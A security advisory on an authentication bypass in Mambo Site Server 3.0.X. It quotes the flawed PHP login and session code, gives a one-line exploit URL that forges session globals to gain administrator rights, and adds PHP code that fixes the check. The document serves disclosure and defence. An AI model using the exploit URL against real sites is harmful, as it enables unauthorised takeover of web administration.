COMMAND

    Mambo Site Server

SYSTEMS AFFECTED

    Mambo Site Server version 3.0.X

PROBLEM

    Ismael Peinado Palomo found the following.  Mambo Site Server is a
    dynamic portal engine and content management tool based on PHP and
    MySQL.  Any user can gain administrator privileges.

    Under the 'administrator/' directory we find that index.php checks
    the user and password:

        if (isset($submit)){
          // look up the submitted username, but only among admin accounts
          $query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
          $result = $database->openConnectionWithReturn($query);
          if (mysql_num_rows($result) != 0){
           list($userid, $dbpass, $fullname) = mysql_fetch_array($result);

           // .....

           if (strcmp($dbpass,$pass)) {
            //if the password entered does not match the database record ask user to login again
            print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
           }else {
            //if the password matches the database
            if ($remember!="on"){
             //if the user does not want the password remembered and the cookie is set, delete the cookie
             if ($passwordcookie!=""){
              setcookie("passwordcookie");
              $passwordcookie="";
             }
            }
            //set up the admin session then take the user into the admin section of the site
            session_register("myname");
            session_register("fullname");
            session_register("userid");
            print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
            print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";

           }
          }else {
           //no admin account with that username: ask user to login again
           print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
          }
        }

    As we can see, if the password for the administrator matches the one
    in the database, some variables are registered in the session and we
    are redirected to index2.php, so let's take a look at index2.php:

        if (!$PHPSESSID){
         // no session id seen; $PHPSESSID is a global that any request parameter can set
         print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
         exit(0);
        }
        else {
         // resume the session; the globals are registered into it even if they came from the URL
         session_start();
         if (!$myname) session_register("myname");
         if (!$fullname) session_register("fullname");
         if (!$uid) session_register("userid");
        }

    Here we can see that the only verification of a valid user is
    through the global variable PHPSESSID, so if we declare that variable
    on the URL and also set 'myname', 'fullname' and 'userid', we can
    gain administrative control.  So we test:

        http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

    BINGO!!  Now we have full administrative privileges.  That's a
    typical example of PHP hacking: it is clear that security can't rely
    on global variables, since they may be modified through URL parsing.
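    The point above, as an added example (not Mambo's code): the
    index2.php gate rewritten so that the administrator decision is made
    from server-side session state only, with the parameters in the URL
    playing no part.  The session key names, the PHP 7 syntax and the
    sample user id are this example's own assumptions.

```php
<?php
// Added example, not Mambo's code: the index2.php gate rewritten so that
// "is this an administrator?" is answered only from server-side session
// state. Request parameters (PHPSESSID, myname, fullname, userid) are
// never consulted, so the advisory's URL has nothing to overwrite.
// Key names and PHP 7 syntax are this example's own choices; the
// register_globals ini directive is the legacy PHP setting that turned a
// query-string parameter into a script variable.
declare(strict_types=1);

// Login side (replaces session_register("userid") etc. in index.php):
// store the verified identity under keys only this function writes.
// To be called only after the password comparison has succeeded.
function login_admin(array &$session, int $userid, string $name): void
{
    $session['admin_userid'] = $userid;
    $session['admin_name']   = $name;
}

// Gate side (replaces the `if (!$PHPSESSID)` test in index2.php).
// $session stands in for $_SESSION and $request for $_GET/$_POST so the
// function can be exercised from the CLI; $request is accepted only to
// make explicit that it plays no part in the decision.
function current_admin(array $session, array $request): ?int
{
    if (!isset($session['admin_userid']) || !is_int($session['admin_userid'])) {
        return null;
    }
    return $session['admin_userid'];
}

if (PHP_SAPI === 'cli') {
    // Constructed input mirroring the advisory's URL.
    $forged = ['PHPSESSID' => '1', 'myname' => 'admin',
               'fullname' => 'admin', 'userid' => 'administrator'];

    $anonymous = [];                                   // no login happened
    var_dump(current_admin($anonymous, $forged));      // forged values are ignored

    $authenticated = [];
    login_admin($authenticated, 62, 'admin');          // constructed user id
    var_dump(current_admin($authenticated, $forged));  // only the server-side record counts
} else {
    // In a real request: start the session unconditionally, then decide
    // from $_SESSION alone. register_globals should also be Off in php.ini.
    session_start();
    if (current_admin($_SESSION, $_GET) === null) {
        header('Location: index.php');
        exit;
    }
}
```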

SOLUTION

    Nothing yet.